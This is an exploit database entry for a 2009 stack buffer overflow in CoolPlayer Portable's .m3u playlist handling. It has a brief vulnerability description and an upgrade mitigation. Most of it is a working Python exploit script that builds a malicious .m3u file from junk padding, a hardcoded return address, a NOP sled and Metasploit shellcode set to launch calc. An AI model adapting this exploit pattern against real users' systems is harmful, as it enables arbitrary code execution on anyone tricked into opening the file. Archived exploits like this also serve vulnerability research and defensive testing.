CoolPlayer Portable(m3u) Buffer Overflow exploit

vendor:

CoolPlayer Portable

by:

Gold_m and stack

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: CoolPlayer Portable

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP2

2009

CoolPlayer Portable(m3u) Buffer Overflow exploit

CoolPlayer Portable is vulnerable to a buffer overflow vulnerability when processing specially crafted .m3u files. An attacker can exploit this vulnerability to execute arbitrary code on the target system. The vulnerability is caused due to a boundary error when copying data from the .m3u file into a fixed-length buffer. This can be exploited to cause a stack-based buffer overflow by sending a specially crafted .m3u file with an overly long string. Successful exploitation of this vulnerability can result in arbitrary code execution in the context of the user running the vulnerable application.

Mitigation:

Upgrade to the latest version of CoolPlayer Portable.

Source

Exploit-DB raw data:

#!/usr/bin/python
#[*] Usage   : coolplayer.py
#[*] Bug     : CoolPlayer Portable(m3u) Buffer Overflow exploit
#[*] Founder : Gold_m
#[*] First exploiter : stack "he is my friend :)"
#[*] Tested on :    Xp sp2 (fr)
#[*] Greetings :    All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com

#[*] Note: I didn't know why the stack's exploit won't work for me but i founded that the junk data wasn't right in my case.
#[*] and we have to expand the nops to pass the null byte.
#[*] it worked for me from the beginning.

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x79"
"\xe4\x94\xba\x83\xeb\xfc\xe2\xf4\x85\x0c\xd0\xba\x79\xe4\x1f\xff"
"\x45\x6f\xe8\xbf\x01\xe5\x7b\x31\x36\xfc\x1f\xe5\x59\xe5\x7f\xf3"
"\xf2\xd0\x1f\xbb\x97\xd5\x54\x23\xd5\x60\x54\xce\x7e\x25\x5e\xb7"
"\x78\x26\x7f\x4e\x42\xb0\xb0\xbe\x0c\x01\x1f\xe5\x5d\xe5\x7f\xdc"
"\xf2\xe8\xdf\x31\x26\xf8\x95\x51\xf2\xf8\x1f\xbb\x92\x6d\xc8\x9e"
"\x7d\x27\xa5\x7a\x1d\x6f\xd4\x8a\xfc\x24\xec\xb6\xf2\xa4\x98\x31"
"\x09\xf8\x39\x31\x11\xec\x7f\xb3\xf2\x64\x24\xba\x79\xe4\x1f\xd2"
"\x45\xbb\xa5\x4c\x19\xb2\x1d\x42\xfa\x24\xef\xea\x11\x14\x1e\xbe"
"\x26\x8c\x0c\x44\xf3\xea\xc3\x45\x9e\x87\xf5\xd6\x1a\xe4\x94\xba")

exploit = "\x41"*220 + "\x5D\x38\x82\x7C" + "\x90"*122 + shellcode

try:
    out_file = open("exploit.m3u",'w')
    out_file.write(exploit)
    out_file.close()
    print "Exploit file created!\n"
except:
    print "Error"

# milw0rm.com [2009-04-22]